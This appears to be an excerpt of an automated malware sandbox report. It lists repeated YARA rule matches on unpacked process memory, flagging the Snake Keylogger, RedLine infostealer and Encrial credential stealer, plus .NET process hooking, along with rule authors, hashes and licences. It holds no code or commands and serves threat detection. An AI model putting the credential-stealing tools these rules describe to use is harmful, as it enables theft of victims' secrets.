          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 11.2.Nsltarpn.PIF.210035b8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.brightness.exe.217d67a8.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
